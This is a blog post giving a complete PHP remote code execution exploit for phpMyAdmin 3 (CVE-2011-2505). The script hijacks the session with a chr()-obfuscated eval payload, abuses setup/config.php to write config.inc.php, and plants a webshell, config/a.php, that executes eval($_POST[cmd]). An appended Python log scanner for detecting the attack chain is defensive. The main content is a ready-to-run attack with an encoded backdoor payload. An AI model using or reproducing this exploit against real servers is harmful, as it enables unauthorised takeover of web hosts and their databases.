phpMyAdmin3 remote code execution exploit (PHP version)

Posted on 2013-2-21 09:13:03
I've been a full-time stay-at-home dad lately, out of touch with the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw 黑哥's discussion of the phpMyAdmin3 vulnerability in the php security group. I hadn't read the vulnerable code before, but a while back I had seen wofeiwo's exp on Weibo. 黑哥 said there was a way to exploit it that wasn't so impractical ("chicken ribs"), so I dug through the code during the night and wrote this reheated exp. Since I got to it late and plenty of people had already studied it and written exps, mine is just rehashing old leftovers; treat it as research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and kudos too to the dedication of wofeiwo and superhei, role models to learn from. That said, the earlier exp had some limitations in exploitation:
First, session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already protected from access by .htaccess.
And of course there is a third point, a gulf nobody can cross: the config directory must exist and be writable.

After reading 黑哥's comments in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really isn't all that impractical.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid); // Actually, almost all the PHP files in the pma3 home directory can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// Minimal raw HTTP client over a TCP socket: GET when $data is empty, POST otherwise.
function php_request($url,$data='',$cookie=''){
    global $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // Read until the server closes the connection (Connection: Close above).
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);

    return $resp;
}

?>
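As an added example, not part of the original post or of oldjun's exploit, here is a small Python scanner that flags the request pattern this exploit leaves in a web server's access log: the session-manipulation parameters (`session_to_unset`, `_SESSION[...]`) on the query string, the POST to setup/config.php that rewrites config/config.inc.php, and later fetches of PHP files under config/. The log lines, IP addresses and token values are constructed for the example; the parameter names and paths come from the exploit above. It assumes Apache/Nginx combined log format.

```python
"""
Detection logic for the phpMyAdmin 3 session-injection chain (CVE-2011-2505).
Added example; the access log lines below are constructed, not real data.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Combined log format: ip - - [time] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one client walking the exploit's steps, one benign client.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/config/ HTTP/1.1" 403 212 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/index.php HTTP/1.1" 200 8731 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/db_create.php?token=0123456789abcdef0123456789abcdef&session_to_unset=x&_SESSION[ConfigFile][Servers][1][host]=PLACEHOLDER HTTP/1.1" 200 1021 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:06 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:07 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Feb/2013:09:14:00 +0800] "GET /pma/index.php?token=fedcba9876543210fedcba9876543210&db=test HTTP/1.1" 200 8731 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Feb/2013:09:14:01 +0800] "GET /pma/setup/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""


def classify_request(method, target):
    """Return the reasons (possibly none) a request matches the exploit chain."""
    reasons = []
    parts = urlsplit(target)
    path = parts.path.lower()

    # Step 1: session manipulation via query-string keys. parse_qsl keeps the
    # raw bracketed key names, e.g. "_SESSION[ConfigFile][Servers][1][host]".
    for key, _ in parse_qsl(parts.query, keep_blank_values=True):
        k = key.lower()
        if k.startswith("_session[") or k == "session_to_unset":
            reasons.append(f"session manipulation parameter: {key}")
            break

    # Step 2: the setup page save that writes config/config.inc.php.
    if method == "POST" and path.endswith("/setup/config.php"):
        reasons.append("POST to setup/config.php (writes config/config.inc.php)")

    # Step 3: verification / use of what was written under config/.
    if path.endswith("/config/config.inc.php"):
        reasons.append("direct request for config/config.inc.php")
    elif re.search(r"/config/[^/]+\.php$", path):
        reasons.append("request for a PHP file under config/")

    return reasons


def scan_log(lines):
    """Return (ip, time, method, target, reasons) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        reasons = classify_request(m["method"], m["target"])
        if reasons:
            hits.append((m["ip"], m["time"], m["method"], m["target"], reasons))
    return hits


def attack_chains(hits):
    """Client IPs that performed both the session-injection and the config-write step."""
    injected, wrote = set(), set()
    for ip, _, _, _, reasons in hits:
        for r in reasons:
            if r.startswith("session manipulation"):
                injected.add(ip)
            elif r.startswith("POST to setup/config.php"):
                wrote.add(ip)
    return sorted(injected & wrote)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for ip, when, method, target, reasons in found:
        print(f"{when} {ip} {method} {target[:60]}: {'; '.join(reasons)}")
    print("full chains from:", attack_chains(found))
```

A single hit on step 1 is already worth an alert, since no legitimate phpMyAdmin page sends `_SESSION[...]` keys in a query string; the chain view is there to cut noise when the same client also performs the setup save. The exploit's own precondition (a config/ directory that exists and is writable) is also the hardening check: once setup is finished, remove that directory or make it unwritable and the write in step 2 fails.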